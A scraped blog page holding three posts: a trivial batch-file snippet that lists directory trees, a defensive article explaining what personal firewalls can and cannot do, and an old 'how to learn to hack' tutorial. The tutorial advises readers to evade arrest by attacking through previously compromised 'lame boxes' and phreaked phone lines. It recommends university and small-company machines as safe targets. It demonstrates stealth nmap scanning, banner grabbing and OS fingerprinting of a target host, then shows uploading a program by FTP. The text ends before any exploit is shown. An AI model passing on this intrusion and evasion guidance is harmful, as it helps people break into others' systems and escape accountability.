how to make a refersh.exe

at  frist go to your notepad and type:  
Echo Off
cd/
C:
Tree
D:
tree
E:
tree
after typing save as  bat file
run you pc than see you create a tree programme
Posted by ojana at 18:57 0 comments

 

Firewall Protection how to

 
Firewall Protection how to
What is a Firewall?
A firewall is a tool that monitors communication to and from your computer. It sits between your computer and the rest of the network, and according to some criteria, it decides which communication to allow, and which communication to block. It may also use some other criteria to decide about which communication or communication request to report to you (either by adding the information to a log file that you may browse whenever you wish, or in an alert message on the screen), and what not to report.

What Is It Good For?
Identifying and blocking remote access Trojans. Perhaps the most common way to break into a home computer and gain control, is by using a remote access Trojan (RAT). (sometimes it is called "backdoor Trojan" or "backdoor program". Many people simply call it a "Trojan horse" although the term "Trojan horse" is much more generic). A Trojan horse, is a program that claims to do something really innocent, but in fact does something much less innocent. This goes to the days where the Greek soldiers succeeded to enter through the gates of Troy by building a big wooden horse, and giving it as a present to the king of Troy. The soldiers allowed the sculpture to enter through their gates, and then at night, when the soldiers were busy guarding against an outside attack, many Greek soldiers who were hiding inside the horse went out and attacked Troy from the inside. This story, which may or may not be true, is an example of something which looks like something innocent and is used for some less innocent purpose. The same thing happens in computers. You may sometimes get some program, via ICQ, or via Usenet, or via IRC, and believe this program to be something good, while in fact running it will do something less nice to your computer. Such programs are called Trojan horses. It is accepted to say that the difference between a Trojan horse and a virus, is that a virus has the ability to self-replicate and to distribute itself, while a Trojan horse lacks this ability. A special type of Trojan horses, is RATs (Remote Access Trojans, some say "remote admin Trojans"). These Trojans once executed in the victim's computer, start to listen to incoming communication from a remote matching program that the attacker uses. When they get instructions from the remote program, they act accordingly, and thus let the user of the remote program to execute commands on the victim's computer. To name a few famous RATs, the most common are Netbus, Back-Orifice, and SubSeven (which is also known as Backdoor-G). In order for the attacker to use this method, your computer must first be infected by a RAT.
Prevention of infections by RATs is no different than prevention of infection by viruses. Antivirus programs can identify and remove most of the more common RATs. Personal firewalls can identify and block remote communication efforts to the more common RATs and by thus blocking the attacker, and identifying the RAT.

Blocking/Identifying Other Types of Trojans and WQorms?
There are many other types of Trojan horses which may try to communicate with the outside from your computer. Whether they are e-mail worms trying to distribute themselves using their own SMTP engine, or they might be password stealers, or anything else. Many of them can be identified and blocked by a personal firewall.

Identifying/Blocking Spyware's/Adbots?
The term "spyware" is a slang which is not well defined. It is commonly used mainly for various adware (and adware is a program that is supported by presenting advertisements to the user), and that during their installation process, they install an independent program which we shall call "adbot". The adbot runs independently even if the hosting adware is not running, and it maintains the advertisements, downloads them from the remote server, and provides information to the remote server. The adbot is usually hidden. There are many companies that offer adbots, and advertisements services to adware. The information that the adbots deliver to their servers from the computer where the adbot is installed, is "how much time each advertisement is shown, which was the hosting adware, and whether the user clicked on the advertisement. This is important so that the advertisements server will be able to know how much money to get from each of the advertised companies, and how much from it to deliver to each of the adware maintainers. Some of the adbots also collect other information in order to better choose the advertisements to the users. The term "spyware" is more generic, but most of the spyware fall into this category. Many types of adbots can be identified and blocked by personal firewalls.

Blocking Advertisements?
Some of the better personal firewalls can be set to block communication with specific sites. This can be used in order to prevent downloading of advertisements in web pages, and thus to accelerate the download process of the web sites. This is not a very common use of a personal firewall, though.

Preventing Communication to Tracking Sites?
Some web pages contain references to tracking sites. e.g. instruct the web browser to download a small picture (sometimes invisible) from tracking sites. Sometimes, the pictures are visible and provide some statistics about the site. Those tracking sites will try to save a small text either as a small file in a special directory, or as a line in a special file (depending on what is your browser), and your browser will usually allow the saving site to read the text that it saved on your computer. This is called "web cookies" or sometimes simply "cookies". Cookies allow a web site to keep information that it saved some time when you entered it, to be read whenever you enter the site again. This allow the web site to customize itself for you, and to keep track on everything that you did on that site. It does not have to keep that information on your computer. All it has to save on your computer is a unique identifying number, and then it can keep in the server's side information regarding what has been done by the browser that used that cookie. Yet, by this method, a web site can get only information regarding your visits in it. Some sites such as "doubleclick" or "hitbox" can collect information from various affiliated sites, by putting a small reference in the affiliated pages to some picture on their servers. When you enter one of the affiliated web pages, your browser will communicate with the tracking site, and this will allow the tracking site to put or to read a cookie that identifies your computer uniquely, and it can also know what was the web page that referred to it, and any other information that the affiliated web site wanted to deliver to the tracking site. This way tracking sites can correlate information from many affiliated sites, to build information that for example will allow them to better customize the advertisements that are put on those sites when you browse them.
Some personal firewalls can be set to block communication to tracking sites. It is not a common use of a personal firewall, though, and a personal firewall is not the best tool for that, but if you already have one, this is yet another possible use of it.

Blocking or Limiting the NetBIOS Communication? (as well as other default services)
The two common methods of intruders to break into home computers, are through a RAT (which was discussed in II.3a) and through the NetBIOS communication. The NetBIOS is a standard for naming computers in small networks, developed long ago by IBM and Microsoft. There are a few communication standards which are used in relation to the NetBIOS. The ones that are relevant for Microsoft Windows operating systems, are: NBT (NetBIOS over TCP/IP), IPX/SPX, and NetBEUI. The communication standard which is used over the Internet, is NBT. If it is enabled, and there is no firewall or something else in the middle, it means that your computer is listening for communications over the Internet via this standard, and will react according to the different NBT commands that it gets from the remote programs. It is thus that the NBT (which sometimes loosely called "NetBIOS") is acting as a server. So the next question should be "what remote NBT commands the NBT server will do on the local computer". The answer to this question depends on the specific setting on your computer. You may set your computer to allow file and print sharing. If also NBT is enabled, it means that you allow remote users to share your files or printers. This is a big problem. It is true that in principle the remote user has to know your password for that computer, but many users do not set a password for their user on Windows, or set a trivial password. Older versions of Win95 had file and print sharing over NetBIOS enabled by default. On Win98, and WinMe it was disabled by default, but many technicians, when they set a home network, they enable the file and print sharing, without being aware that it influences also the authorizations of a remote Internet user. There are even worms and viruses who use the File sharing option to spread in the Internet. Anyway, no matter whether you need it for some reason or just are not aware of it, a personal firewall can identify and block any external effort to communicate with the NetBIOS server on your computer. The more flexible personal firewalls can be set to restrict the authorization to communicate with the NetBIOS. Some Windows operating systems, especially those which are not meant for home uses, offer other public services by default, such as RPC. A firewall can identify communication efforts to them, and block them. Since such services listen to remote communications, there is a potential risk when there are efforts to exploit security holes in the programs that offer the services, if there are such security holes. A firewall may block or limit the communication to those services.

Hiding Your Computer on the Internet?
Without a firewall, on a typical computer, even if well maintained, a remote person will still be able to know that the communication effort has reached some computer, and perhaps some information about the operating system on that computer. If that computer is handled well, the remote user will not be able to get much more information from your computer, but might still be able to identify also who your ISP is, and might decide to invest further time in cracking into your computer.
With a firewall, you can set the firewall so that any communication effort from remote users (in the better firewalls you may define an exception list) will not be responded at all. This way the remote user will not be able to even know that it reached a live computer. This might discourage the remote attacker from investing further time in effort to crack into your computer.

The Non-Firewall Defenses

We've discussed a few situations where a personal firewall can provide defense. Yet, in many cases a computer maintainer can deal with those situations even without a firewall. Those "alternative" defenses, in many cases are recommended regardless of whether you use a firewall or not.

Remote Access Trojans?
The best way to defend against remote access Trojans (RATs) is to prevent them from being installed in the first place on your computer. A RAT should first infect your computer in order to start to listen to remote communication efforts. The infection techniques are very similar to the infection techniques that viruses use, and hence the defense against Trojan horses is similar to the defense against viruses. Trojan horses do not distribute themselves (although they might be companions of another Internet worm or virus that distributes them. Yet, because in most cases they do not distribute themselves, it is likely that you will get them from anonymous sources, such as instant messengers, Kazaa, IRC, or a newsgroup. adopting a suspicious policy regarding downloads from such places, will save you not only from viruses but also from getting infected with Trojan horses, including RATs. Because Trojan horses are similar in some ways to viruses, almost all antivirus programs can identify, block from being installed, and remove most of the Trojan horses, including all the common ones. There are also some programs (sometimes called antiTrojan programs) which specialize in the identification and removal of Trojan horses. For a list of those programs, and for comparison on how well different antivirus, and antiTrojan programs identify different Trojan horses, see Hackfix (http://www.hackfix.org), under "Software test results". Hackfix also has information on the more common RATS (such as the Netbus and the Subseven) and on how to remove them manually. There are some tools and web sites, such port scanners, and some ways with a use of more generic tools such as telnet, msconfig, and netstat, which may help you to identify a RAT.

Other types of Trojans and worms?
Also here your main interest should be to prevent them from infecting your computer in the first place, rather than blocking their communication. A good antivirus and a good policy regarding the prevention of virus infections, should be the first and most important defense.

Spyware and Adbots?
The term spyware is sometimes misleading. In my view, it is the responsibility of the adware developer to present the fact that the adware installation will install or use an independent adbots, and to provide the information on how this adbot communicates, and which information it delivers, in a fair place and manner before the adware is installed. It is also a responsibility to provide this information in their web sites, so that people will be aware of that before they even download the software. Yet, in general, those adbots do not pose any security threat, and in many cases also their privacy threat is negligible for many people (e.g. the computer with adbot number 1127533 has been exposed to advertisements a, b, c, such and such times, while using adware x, while on computer with adbot number 1127534 has been exposed to advertisements a,d, and e, such amount of time, with the use of adware y, and clicked on ads number d). It should be fully legitimate for software developers to offer an advertisement supported programs, and it is up to the user to decide whether the use of the program worth the ads and the adbot, or not. Preventing adbot from communicating is generally not a moral thing. If you decide to use an adware, you should pay the price of letting the adbot work. If you don't want it, please remove the adware, and only if for some reason the adbot continue to work even if no hosting adware that uses it is installed, you may remove the adbot. Anyway, there are some very useful tools to identify whether a program is a "spyware", or whether a "spyware" is installed on your computer, and you are certainly entitled to this information. Two useful programs are "AdAware" which identifies "spyware" components on your computer and allows you to remove them, and Ad-Search which allows you to provide a name of a program, and it tells you whether this program is a "spyware" and which adbot it uses. It is useful to assist you in choosing whether to install a program or not. You may find those programs in http://www.lavasoft.nu (or, if it doesn't work, you may try http://www.lavasoftusa.com). Those programs are useful, mainly because many adware developers are not fair enough to present this information in a fair manner. AdAware allows you to also remove those adbot components from your computer. This might, however, terminate your license to use the hosting adware programs, and might even cause them to stop functioning. A website which offers to check whether a specific program that you wish to install is "spyware" or not, is http://www.spychecker.com .

Blocking Advertisements?
Leaving aside the moral aspect of blocking advertisements, a personal firewall is not the best tool for that anyway. This is not the main purpose of a firewall, and neither its main strength. Some of them can block some of the advertisements from being downloaded, if you know how to configure them for that. Yet, there are better tools for that, such as Proxomitron (http://www.proxomitron.org), CookieCop 2 (search for the word cookiecop on http://www.pcmag.com), or Naviscope (http://www.naviscope.com), and there are many other programs as well. You may check for other alternatives, e.g. in Tucows (http://www.tucows.com/adkiller95.html).

Blocking Tracking Sites?
Also here, a personal firewall is not the best tool for that, and there are other tools and ways which are more effective. These are cookie utilities. Since a tracking site uses a cookie to identify and relate the information gathered to the same person (or computer), by preventing the cookie from being installed. The tracking site will lose its ability to track things. There are plenty of cookie management utilities. Some of them are freeware, and some are not. CookieCop which was mentioned in the former section is one of them. WebWasher (http://www.webwasher.com) is another recommended one, and there are plenty of other alternatives such as cookie-crusher, cookie-pal, pop-up killer, etc. You may search for other alternatives, in Tucows (http://www.tucows.com/cookie95.html).

NetBIOS and Other Services?
The NetBIOS over TCP/IP (NBT) which is sometimes loosely called "NetBIOS", is a service which has some security problems with it. It is enabled by default in Windows default installations, and it is very common to see that a firewall does the job of preventing the efforts to get access to your computer via NBT. Yet, in almost all cases, this service is not needed, and thus can be disabled. To disable NBT in Win95/98/ME is not as simple as it is in Win2K/XP, but can still be done reliably. We explain how to do this in another article (#to be written soon). It is needless to say, that if NBT is disabled, there is no need for a firewall to block communication to it. Also, in the case of other services, such as RPC services, and others, in many cases you simply don't need those services and better disable them from within Windows rather than use the firewall to block them. There are various ways to know which services are running on your computer, and which of them are listening for communications from the outside. If there are ones that you don't need, they should be disabled.

Hiding the Computer?
In web sites of many personal firewall companies, they are putting a lot of weight on the ability of their firewall to hide the computer on the Internet. Yet, exposing your home computer on the Internet is by itself, neither a security nor a privacy threat. If you provide some services to the Internet on your computer, for example, you put a web server on your computer to allow other people to view web pages, then you might get rid of some of the crackers, by setting your firewall to unhide only this type of communications. Some attackers will not make a full scan of your computer, but only a partial scan, and if they did not scan for the specific service that you provided, they will not see your computer. Yet, if the service is a common one, there is a good chance for many of them to scan it and thus find the existence of your computer. If they "see" the existence of your computer, they might decide to scan it further, and find out the services you are providing, and scan it for security holes to use. Yet, there is no much meaning to it when we speak about simple home computers.

What a Firewall Cannot Do!

Another misconception about personal firewalls is that they are incorrectly thought as if they claim to give an overall protection against "hackers" (i.e. intrusions). They are not.
Defense Against Exploitation of Security Holes
A firewall can allow or deny access to your computer or from your computer according to the type of communication, its source and destination, and according to the question which program on your computer is handling the communication. Yet, its ability to understand the details of the communication is very limited. For example, you may set the firewall to allow or to deny your e-mail program from getting and/or sending messages. It may allow or deny your web browser from browsing the Internet. But if you allowed your e-mail program to communicate with the e-mail servers for sending and receiving messages, (and you are likely to allow it if you want to use your e-mail program), or if you set the firewall to allow your web browser to communicate with web sites, the firewall will not be able to understand the content of the communication much further, and if your web browser has a security hole, and some remote site will try to exploit it, your firewall will not be able to make a distinction between the communication that exploits the security hole, and legitimate communication. The same principle goes with e-mail program. A personal firewall may block you from receiving or sending e-mail messages, but if you allowed it to receive messages, the personal firewall will not make a distinction between a legitimate message and a non-legitimate one (such as a one that carries a virus or a Trojan horse). Security holes in legitimate programs can be exploited and a personal firewall can do practically nothing about it.
I should comment, however, that some personal firewalls come combined with some Trojan horse detection, or intrusion detection. This is not part of the classical definition of a firewall, but it might be useful. Such tasks are usually taken by other tools such as antivirus programs or antiTrojan programs.

Tricks to Bypass or Disable Personal Firewalls
There are also various ways to disable, or bypass personal firewalls. During the time a few tricks to bypass or disable were demonstrated by various programs. Especially, tricks for an internal program to communicate with the outside bypassing or tricking the firewall. For some of them such as the one demonstrated by the Leaktest, and in which a non-legitimate program disguises itself as Internet Explorer, practically today, all personal firewalls are immuned. For other tricks, such as a one demonstrated by Outbound, which uses some non-standard type of communication directly to the network adapters bypassing the components of the operating system which are suppose to deal with Internet communication, and by that bypassing the firewall, are only now being patched against by the various firewalls, and yet other methods, such as the one demonstrated by Tooleaky, which uses Internet Explorer as a messenger to communicate with the outside, and is thus identified as a mere legitimate browsing, are still waiting for most of the personal firewall to find a fix.

Firewalls CANNOT Decide for You What is a Legitimate Communication and What is Not

One of the main problems with personal firewalls, is that you cannot simply install them and forget them, counting on them to do their job. They can deny or permit various types of communications according to some criteria, but what is this criteria, and who decides what is the criteria for whether they should permit or deny some communication?

The answer, is that it is the computer user's job to define the exact criteria when the firewall should allow a communication and when it should block it. The firewall may make it easier for you, but it should not take the decisions. There are too many programs, too many versions, and it is not possible for the firewall to decide accurately when a communication is legitimate and when it is not. One person might think that it is legitimate for some program to deliver some information to the outside in order to get some service, while another will think that it is not. One version of a program might communicate with its home server in order to check whether there is an upgrade, and another version might also install the upgrade even if you do not wish. Some firewalls will try to identify communication efforts which are largely considered as legitimate, and will let you the information so that it will be easier for you to decide whether such should be allowed. Others will suffice with more basic information, making no suggestions (and thus - no incorrect recommendations). One way or another, once you installed a firewall, you will have better means to understand what types of communications are running on your computer, but you will also have to understand them in order to be able to configure your firewall so that it will correctly know which communications to allow and which to block.

Common Problems and Deficiencies Regarding Personal Firewalls

A personal firewall might be a good contribution to security. Yet, if you do not understand much about the topic, then you are likely to be confused and misled by its alerts and queries, and thus find yourself spending hours in chasing after imaginary crackers, fear from imaginary threats, and misconfigure it due to misunderstanding. You may find yourself blocking legitimate and important communication believing it to be cracking efforts, and thus surprised to see why things work slowly or why you are disconnected from the Internet, or you might be misled to allow a non-legitimate communication by some software that tricked you to believe that it is a legitimate one. On the other side, if you are quite knowledgeable on computers and security, then you are likely to effectively defend your computer even without a firewall (by means discussed in section II.4) and it is thus that the role of personal firewall in securing your computer, is extremely small and not much important. We discuss here in brief some of the problems that personal firewalls may generate.

A False Sense of Security

As we've already learned here, a firewall is limited in its ability to secure your computer. Yet, many people believe that if they will install a personal firewall they will be secured against the various security threats. I was even surprised to find out that there are people who believe that give much higher priority in installing a personal firewall than in installing an antivirus program. An always updated antivirus program plays a much more important role in the security of a personal home computer than installing and maintaining a personal firewall. A personal firewall should not come on account of any other security measure that you use.

A False Sense of Insecurity

When you install a firewall and you look at all the communication efforts through it, you might be surprised at the amount of communication efforts from the Internet to your computer. Most of them are blocked by a typically configured firewall. There are all the times efforts to try to communicate with various backdoor Trojans on your computers. If you are not infected, there will be nothing to listen and to respond to those communication efforts, and they are thus practically harmless. There are efforts to communicate with your NBT driver, to see if your computer by mistake allows file sharing. There are other types of probes to see if your computer exists, or various efforts of servers to probe your computer in order to find the best path for legitimate communication to it. There are sometimes remnants of communications that were supposed to go to other computers, but made their way to yours (for advanced readers: because the IP number that your computer uses, were used by some other computer earlier). Those communication efforts are blocked even without a firewall. If your computer is not infected with a RAT, and if your computer don't have NetBIOS over TCP/IP enabled or even it does not have file and print sharing enabled (and on most computers this is disabled by default), then none of these pose any security threat. If your computer is not infected with a SubSeven Trojan, then no matter how often there will be efforts to communicate with it, they are all doomed to be failed.
Yet, some personal firewall (such as Norton Personal Firewall or ZoneAlarm) by default proudly announce that they have just blocked an effort to crack into your computer. Norton may even define those efforts that were blocked as "high security threats" while they were not a threat at all even if your computer didn't have a personal firewall at all. Such firewalls give you the false impression that they save your computer again and again from extremely dangerous threats on the Internet, so that you wonder how did you survive so much time without noticing any intrusion before you installed the firewall. I usually say, that those personal firewalls are set their "report level" to "promotional mode". Namely, the personal firewall is set to give you the false impression that it is much more important than it really is.

Chasing After Ghosts

This is a side effect of the types of misunderstandings that were discussed in the previous subsection.
When a person who starts to learn about the jargon related to personal firewalls, is reported that some "dangerous" communication efforts persist from the same source, the person is decisive to locate and identify the "hacker", and perhaps report about it to the police or to its Internet service provider. However, since many people do not really understand thoroughly how things work, they may sometimes spend many hours in trying to locate a cracker that does not exist, or when the knowledge they need to have, in order to track the cracker, is much higher than what they have, and they might even suspect the wrong person due to lack of knowledge (e.g. the connection person on the Internet service provider that was used by the cracker). More knowledgeable people, usually do not bother to track those "hackers" (which are usually teenagers), but instead are concentrating on the security of their computer.

Blocking Legitimate Communications

No personal firewall is smart enough to decide for the user what is a legitimate communication and what is not. A personal firewall cannot make a distinction between a legitimate program trying to contact its server to check and notify the user when there is a newer version, and a non-legitimate program trying to communicate with its server in order deliver sensitive information such as passwords, unless the user tells it. It is thus up to the user to decide what should be considered as legitimate and what should not. Yet, can we count on the user to be knowledgeable enough to decide what is legitimate and what is not? In many cases the user is not knowledgeable enough, and may thus allow non-legitimate communication or disallow a legitimate and important communication. There are many types of communications handled just to manage other communications. Among this are various types of communications between your computer and the various servers of your Internet service provider. A not knowledgeable user may interpret those types of communications as cracking efforts, and will thus decide to block them. As a result, a connection might become slower, a connection to the Internet service provider might be disconnected quiet often and other types of communication problems.

Being Tricked by Trojans bbb

Just as less knowledgeable users may instruct the firewall to block legitimate communications, they can be tricked by various Trojans to allow them to communicate. Some Trojans are using names resembling or identical to names of legitimate programs, so that the user would think that it is a legitimate programs. Users should be aware of that.

Heavy Software, Buggy Software

Until now we discussed only problems related to lack of appropriate knowledge by the user. Yet, there are other problems regarding personal firewalls. For example, some of them are known to be quite heavy on computer resources, or slow down the communication speed. Different personal firewalls quite vary with regard to that. If you have a new computer with a slow Internet communication (such as regular dial-up networking) then it might not slow down your computer noticeably. Yet, if you use an older computer, and a fast communication, you might find that some personal firewalls will slow down your communication quite drastically. Personal firewalls also vary on how much they are stable.

Advantages of External Firewalls over Personal Firewalls

1. They do not take resources from the computer. This should be clear. This is especially useful when the firewall blocks flooding attacks.
2. It is harder (although in principle still possible) for a Trojan horse to disable it, because it does not reside in the same computer that the Trojan has infected. It is not possible to use the specific communication while totally bypassing the firewall.
3. They can be used without any dependence on the operating system on the computer(s) they defend.
4. No instability problems.

Posted by ojana at 18:38 0 comments

 

How to learn to hack in easy steps


How to learn to hack in easy steps
                             ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

                                       Introduction
                                       ~~~~~~~~~~~~

Hi there, I'm TDC and I'd like to give back all the things i've learnt from the hackers i've
met. I want to write this because most tutorials i've found (very good tutorials) are now
old and don't fit just like they did before. This is why i'm going to teach you and show you
the way to learn to hack.

If you are a hacker, you read this, and find something that's not correct or you don't like,
i want to know. mail me.

I'm sure you'll find a lot of bad-grammars. Don't report them cause I'm not english and
i don't care at all as long as it's understandable.

On this document I talk about many security tools, you can find all them and also contact
me on my site: www.3b0x.com

When you finish reading it, please TELL ME how you like it!

I want to make newer versions of it, check on my site to stay informed.

COPYING: You're welcome to distribute this document to whoever the hell you want, post it
         on your website, on forums, newsgroups, etc, AS LONG as you DON'T MODIFY it at all.
         If you want to perform it, ask me for permission. thanks a lot!

DISCLAIMER: This document is intended for ludical or educational purposes. I don't want to
            promote computer crime and I'm not responible of your actions in any way.
            If you want to hack a computer, do the decent thing and ask for permission first.



                                       Let's start
                                       ~~~~~~~~~~~

If you read carefully all what i'm telling here, you are smart and you work hard on it,
you'll be able to hack. i promise. That doesn't really make you a hacker (but you're on the way).
A hacker is someone who is able to discover unknown vulnerabilities in software and able to
write the proper codes to exploit them.

NOTE: If you've been unlucky, and before you found this document, you've readen the
guides to (mostly) harmless hacking, then forget everything you think you've learnt from them.
You won't understand some things from my tutorial until you unpoison your brain.


                                    Some definitions
                                    ~~~~~~~~~~~~~~~~

I'm going to refer to every kind of computer as a box, and only as a box.
This includes your PC, any server, supercomputers, nuclear silos, HAL9000,
Michael Knight's car, The Matrix, etc.

The systems we're going to hack (with permission) are plenty of normal users, whose
don't have any remote idea about security, and the root. The root user is called
superuser and is used by the admin to administer the system.

I'm going to refer to the users of a system as lusers. Logically, I'll refer to
the admin as superluser.



                                   Operating Systems
                                   ~~~~~~~~~~~~~~~~~

Ok, I assume you own a x86 box (this means an intel processor or compatible) running windoze9x,
or perhaps a mac (motorola) box running macOS.

You can't hack with that. In order to hack, you'll need one of those UNIX derived operating
systems.
This is for two main reasons:

-the internet is full of UNIX boxes (windoze NT boxes are really few) running webservers and
 so on. to hack one of them, you need a minimun knowledge of a UNIX system, and what's better
 than running it at home?

-all the good hacking tools and exploit codes are for UNIX. You won't be able to use them unless
 you're running some kind of it.

Let's see where to find the unix you're interested on.

The UNIX systems may be divided in two main groups:

 - commercial UNIXes
 - free opensource UNIXes

A commercial unix's price is not like windoze's price, and it usually can't run on your box,
so forget it.

The free opensource UNIXes can also be divided in:
 - BSD
  These are older and difficult to use. The most secure OS (openBSD) is in this group.
  You don't want them unless you're planning to install a server on them.

 - Linux
  Easy to use, stable, secure, and optimized for your kind of box. that's what we need.

I strongly suggest you to get the SuSE distribution of Linux.
 It's the best one as i think, and i added here some tips for SuSE, so all should be easier.

Visit www.suse.de and look for a local store or order it online.
 (i know i said it the software was free, but not the CDs nor the manual nor the support.
  It is much cheaper than windoze anyway, and you are allowed to copy and distribute it)

If you own an intel box, then order the PC version.

If you own a mac box, then order the PowerPC version.

Whatever you do, DON'T PICK THE COREL DISTRIBUTION, it sucks.

It's possible you have problem with your hardware on the installation. Read the manual, ask
for technical support or buy new hardware, just install it as you can.

This is really important! READ THE MANUAL, or even buy a UNIX book.
Books about TCP/IP and C programming are also useful.

If you don't, you won't understand some things i'll explain later. And, of course, you'll
never become a hacker if you don't read a lot of that 'literature'.



                                        the Internet
                                        ~~~~~~~~~~~~

Yes! you wanted to hack, didn't you? do you want to hack your own box or what?
You want to hack internet boxes! So lets connect to the internet.

Yes, i know you've gotten this document from the internet, but that was with windoze
and it was much easier. Now you're another person, someone who screams for knowledge and wisdom.
You're a Linux user, and you gotta open your way to the Internet.

You gotta make your Linux box to connect to the net,
so go and set up your modem (using YaST2 in SuSE).

Common problems:

If your box doesn't detect any modems, that probably means that you have no modem installed
:-D (not a joke!).

Most PCI modems are NOT modems, but "winmodems". Winmodems, like all winhardware, are
specifically designed to work ONLY on windoze. Don't blame linux, this happens because the
winmodem has not a critical chip that makes it work. It works on windoze cause the vendor
driver emulates that missing chip. And hat vendor driver is only available for windoze.


ISA and external modems are more probably real modems, but not all of them.
If you want to make sure wether a modem is or not a winmodem, visit http://start.at/modem.

Then use your modem to connect to your ISP and you're on the net. (on SuSE, with wvdial)

NOTE: Those strange and abnormal online services like aol are NOT ISPs. You cannot connect the
internet with aol. You can't hack with aol. i don't like aol. aol sucks.
Don't worry, we humans are not perfect, and it's probably not your fault. If that is your case,
leave aol and get a real ISP. Then you'll be forgiven.


                                     Don't get busted
                                     ~~~~~~~~~~~~~~~~


Let's  suppose you haven't skipped everything below and your Linux bow is now connected to the net.

It's now turn for the STEALTH. You won't get busted! just follow my advices and you'll be safe.

- Don't hack
  this is the most effective stealth technique. not even the FBI can bust you. :-)
  If you choose this option, stop reading now, cause the rest is worthless and futile.

- If you change a webpage, DON'T SIGN! not even with a fake name. they can trace you, find
  your own website oe email address, find your ISP, your phone number, your home...
  and you get busted!!

- be PARANOID, don't talk about hacking to anyone unless he is really interested in hacking too.
  NEVER tell others you've hacked a box.

- NEVER hack directly from your box (your_box --> victim's box).
  Always use a third box in the middle (your_box --> lame_box --> victim's box).

  Where lame_box is a previously hacked box or...a shell account box!
  A shell account is a service where you get control of a box WITHOUT hacking it.
  There are a few places where shell accounts are given for free. One of them is nether.net.

- Don't hack dangerous boxes until you're a real hacker.
   Which boxes are dangerous:
     Military boxes
     Government boxes
     Important and powerful companies' boxes
     Security companies' boxes
   Which boxes are NOT dangerous:
     Educational boxes (any .edu domain)
     Little companies' boxes
     Japanese boxes

- Always connect to the internet through a free and anonymous ISP
  (did i tell you that AOL is NOT an ISP?)

- Use phreking techniques to redirect calls and use others' lines for your ISP call.
  Then it'll be really difficult to trace you. This is not a guide to phreaking anyway.


                                  TCP ports and scanning
                                  ~~~~~~~~~~~~~~~~~~~~~~

Do you got your stealth linux box connected to the internet (not aol)?
Have you read the manual as i told you?


Then we shall start with the damn real thing.

First of all, you should know some things about the internet. It's based on the TPC/IP protocol,
(and others)

It works like this: every box has 65k connection PORTS. some of them are opened and waiting for
your data to be sent.

So you can open a connection and send data to any these ports. Those ports are associated with
a service:

Every service is hosted by a DAEMON. Commonly, a daemon or a server is a program that runs
on the box, opens its port and offers their damn service.

here are some common ports and their usual services (there are a lot more):

             Port number                   Common service            Example daemon (d stands for daemon)
                          21                                  FTP                   FTPd
                          23                                  Telnet   telnetd
                          25                                  SMTP               sendmail (yes!)
                          80                                   HTTP                apache
                          110                                POP3                qpop


Example:
when you visit the website http://www.host.com/luser/index.html, your browser does this:
-it connects to the TCP port 80
-it sends the string: "GET /HTTP/1.1 /luser/index.html" plus two 'intro'
      (it really sends a lot of things more, but that is the essential)
-the host sends the html file

The cool thing of daemons is they have really serious security bugs.

That's why we want to know what daemons are running there, so...

We need to know what ports are opened in the box we want to hack.

How could we get that information?

We gotta use a scanner. A scanner is a program that tries to
connect to every port on the box and tells which of them are opened.

The best scanner i can think of is nmap, created by Fyodor.
You can get nmap from my site in tarball or rpm format.

Let's install nmap from an .rpm packet.

             bash-2.03$ rpm -i nmap-2.53-1.i386.rpm

then we run it:

             bash-2.03$ nmap -sS target.edu

             Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ )
             Interesting ports on target.edu (xx.xx.xx.xx):
             (The 1518 ports scanned but not shown below are in state: closed)
             Port       State       Service
             21/tcp     open        ftp
             23/tcp     open        telnet
             25/tcp     open        smtp
             80/tcp     open        http
             110/tcp    open        pop3


             Nmap run completed -- 1 IP address (1 host up) scanned in 34 seconds


Nmap has told us which ports are opened on target.edu and thus, what services it's offering.

I know, i said telnet is a service but is also a program (don't let this confuse you).
This program can open a TCP connection to the port you specify.

So lets see what's on that ports.

On your linux console, type:

             bash-2.03$ telnet target.edu 21
             Trying xx.xx.xx.xx...
             Connected to target.edu.
             Escape character is '^]'.
             220 target.edu FTP server (SunOS 5.6) ready.
             quit
             221 Goodbye.
             Connection closed by foreign host.

You see?
They speak out some valuable information:
-their operating system is SunOS 5.6
-their FTP daemon is the standard provided by the OS.

             bash-2.03$ telnet target.edu 25
             Trying xx.xx.xx.xx...
             Connected to target.edu.
             Escape character is '^]'.
             220 target.edu ESMTP Sendmail 8.11.0/8.9.3; Sun, 24 Sep 2000 09:18:14 -0
             400 (EDT)
             quit
             221 2.0.0 target.edu closing connection
             Connection closed by foreign host.

They like to tell us everything:
-their SMTP daemon is sendmail
-its version is 8.11.0/8.9.3

Experiment with other ports to discover other daemons.

Why is this information useful to us? cause the security bugs that can let us in depend
on the OS and daemons they are running.

But there is a problem here... such information can be faked!

It's difficult to really know what daemons are they running, but we can know FOR SURE
what's the operating system:

             bash-2.03$ nmap -sS target.edu

             Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ )
             Interesting ports on target.edu (xx.xx.xx.xx):
             (The 1518 ports scanned but not shown below are in state: closed)
             Port       State       Service
             21/tcp     open        ftp
             23/tcp     open        telnet
             25/tcp     open        smtp
             80/tcp     open        http
             110/tcp    open        pop3

             TCP Sequence Prediction: Class=random positive increments
                                Difficulty=937544 (Good luck!)
             Remote operating system guess: Linux 2.1.122 - 2.2.14

             Nmap run completed -- 1 IP address (1 host up) scanned in 34 seconds

Hey wasn't it SunOS 5.6? Damn they're a bunch of lame fakers!

We know the host is running the Linux 2.x kernel. It'd be useful to know also the distribution,
but the information we've already gathered should be enough.

This nmap feature is cool, isn't it? So even if they've tried to fool us, we can know
what's the OS there and its very difficult to avoid it.

Also take a look to the TCP Sequence Prediction. If you scan a host and nmap tells
you their difficulty is low, that means their TCP sequence is predictable and we
can make spoofing attacks. This usually happens with windoze (9x or NT) boxes.

Ok, we've scanned the target. If the admins detect we've scanned them, they could get angry.
And we don't want the admins to get angry with us, that's why we used the -sS option.
This way (most) hosts don't detect ANYTHING from the portscan.
Anyway, scanning is LEGAL so you shouldn't have any problems with it. If you want a better
usage of nmap's features, read its man page:

             bash-2.03$ man nmap


                            How to upload and compile programs
                            ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The most obvious and simple way is using FTP:

             bash-2.03$ ls
             program.c
             sh-2.03$ ftp target.edu
             Connected to target.edu.
             220 target.edu FTP server (SunOS 5.6) ready.
             Name: luser
             331 Password required for luser.
             Password:
             230 User luser logged in.
             ftp> put program.c
             200 PORT command successful.
             150 ASCII data connection for program.c (204.42.253.18,57982).
             226 Transfer complete.
             ftp> quit
             221 Goodbye.


